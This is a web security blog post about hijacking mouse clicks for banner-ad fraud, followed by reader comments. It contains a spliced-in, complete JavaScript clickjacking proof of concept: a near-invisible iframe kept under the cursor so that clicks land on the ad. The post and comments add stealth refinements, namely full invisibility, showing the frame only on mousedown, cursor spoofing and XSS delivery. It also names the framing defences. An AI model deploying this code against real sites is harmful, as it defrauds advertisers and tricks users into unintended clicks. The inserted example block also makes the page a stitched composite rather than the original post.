web application security lab

Stealing Mouse Clicks for Banner Fraud

On the sla.ckers.org board Lobas asked a question about stealing clicks. The short answer is that you cannot force a click inside an iframe on another domain: the same-origin policy stops script on the outer page from reaching into the frame, and with banner advertisers you never know what the links inside will be anyway. However, there is another way, which Jeremiah Grossman mentioned a while back and which I thought was pretty clever. You can move the banner ad so that it sits immediately below the mouse pointer; when the user clicks, the click event goes to the iframe beneath the cursor instead of to whatever they meant to click.

I wrote some sample code, adapted from one of those annoying cursor-following scripts, to show that you can force text in a div (which could just as well be an iframe containing the banner ad) to be placed immediately below the pointer. What I haven't shown is that the onclick event handler can be used to make the div appear at just the right moment, or that you can make it semi-transparent, or any of the other fun tricks. But this proof of concept shows that iframes are not a particularly good way of protecting against stolen click events. Banner advertisers beware!
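To make the mechanics concrete, here is an added example of the cursor-following bait described above. It is not the script from the original post; the frame URL (https://ads.example/banner), the 468x60 banner size and the function names are assumptions for the demo. The geometry is kept in pure functions so the "is the pointer really over the bait?" check can be exercised without a browser, and the page wiring only runs when a document exists:

```javascript
// Added example (not the original ha.ckers.org script): keep a framed banner
// centred under the pointer and nearly transparent, so a click meant for the
// page underneath lands on the frame instead.

// Pure geometry: top/left (px) that centre a box of the given size on the
// pointer. No DOM calls, so it can be checked outside a browser.
function positionUnderCursor(pointer, size) {
  return {
    left: pointer.x - size.width / 2,
    top: pointer.y - size.height / 2,
  };
}

// Does the pointer fall inside a box of the given size placed at pos?
// This is the check that the click would actually hit the bait.
function pointerOverBait(pointer, pos, size) {
  return (
    pointer.x >= pos.left &&
    pointer.x < pos.left + size.width &&
    pointer.y >= pos.top &&
    pointer.y < pos.top + size.height
  );
}

// Apply a position to anything element-like (an object with a .style map).
function applyPosition(el, pos) {
  el.style.position = 'fixed';
  el.style.left = Math.round(pos.left) + 'px';
  el.style.top = Math.round(pos.top) + 'px';
  return el;
}

// Wire the bait to the document: the frame follows every mousemove. A very
// low opacity keeps it visually out of the way while it still receives
// pointer events, because it is the topmost element under the cursor.
function armBait(doc, frame, size) {
  frame.style.opacity = '0.02'; // set to '0' for a fully invisible bait
  frame.style.zIndex = '2147483647';
  frame.style.width = size.width + 'px';
  frame.style.height = size.height + 'px';
  doc.addEventListener('mousemove', function (e) {
    var pos = positionUnderCursor({ x: e.clientX, y: e.clientY }, size);
    applyPosition(frame, pos);
  });
}

// Browser entry point; skipped when the file is run under Node for checks.
if (typeof document !== 'undefined') {
  var bait = document.createElement('iframe');
  bait.src = 'https://ads.example/banner'; // assumed target banner URL
  bait.style.border = '0';
  document.body.appendChild(bait);
  armBait(document, bait, { width: 468, height: 60 }); // classic banner size
}
```

Swapping the mousemove handler for one on mousedown gives the "appear only at the moment of the click" variant. Note that none of this works if the framed site refuses to be framed in the first place (X-Frame-Options or a CSP frame-ancestors directive), which is the real fix on the advertiser's side rather than anything the iframe boundary itself provides.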

7 Responses to “Stealing Mouse Clicks for Banner Fraud”

  1. jonass Says:

    Nice example. Try to improve it by setting the iframe hidden (display:none) by default, and only making it visible with the onmousedown event (which fires before click).

  2. MERLiiN Says:

    Defeat/Bypass.

    Although I am sure this could be optimized or affected by onclick calls, you can currently defeat the travelling banner by clicking, holding the button down, then sliding it onto your "here" link and releasing. This might actually be more annoying than your mailto refresh, and you have just made sure the scammers can earn money by abusing XSS "the simple way(tm)". Expect to see this or derivatives in the wild.

  3. Coolv Says:

    This would work even better if you changed the cursor via DHTML or CSS in order to make it look like there was no image under the cursor. Also consider what jonass stated.

  4. maluc Says:

    If you both read the second to last sentence: "What I haven't shown is that the onclick event handler can be used to make the div appear at the right moment, or that you can make it semi-transparent or any of the other fun tricks." ... you would realize that he already said that. The purpose of a proof of concept is to demonstrate the concept. Demonstrations are kind of difficult to show when everything is invisible, thus the purpose of keeping it visible for now.

    In an actual exploit you would obviously make it hidden for stealthiness.

    Nice PoC RSnake. Jeremiah's mentioned it several times on his blog, but it's good to have examples when explaining to my not-so-tech-savvy friends what I waste my free time doing ^^

  5. RSnake Says:

    Thank you Maluc, I couldn't have said it better myself. Yes, the example I've shown is slightly visible in Firefox (not completely invisible, but if you can't figure out how to change the three variables required to make it completely invisible you probably should avoid using this as an actual exploit). :) And, by the way, this doesn't work well in Internet Explorer, but you get the idea. Again, just a proof of concept.

  6. Coolv Says:

    Yes, I did read that sentence. In my opinion, however, making the cursor seem “real” would be a better demonstration of how this can be a real problem for normal users struggling with rampant advertising.

  7. RSnake Says:

    Coolv, I think what you are failing to understand is that this is a proof of concept. It's not meant to actually steal banner clicks, but rather to show that it's possible. I also didn't show that you need to inject this via XSS on the site in question or build it into the site you want it in, or how the page underneath needs to be constructed to make certain you are in fact clicking on the banner underneath. All of that stuff is relatively easy in comparison with the PoC.

    If you’ve spent any time looking at the XSS cheat sheet, for instance, you’ll see that not once in the 100 or so examples did I put an actual cookie stealing script anywhere in them. If you look at Jeremiah’s XML login detector it’s not even automated. If you look at the Firefox plugin detector it doesn’t even bother to log the results.

    The point isn’t to show exactly how to do it, it’s to show that it can be done. The rest is up to the person developing the code.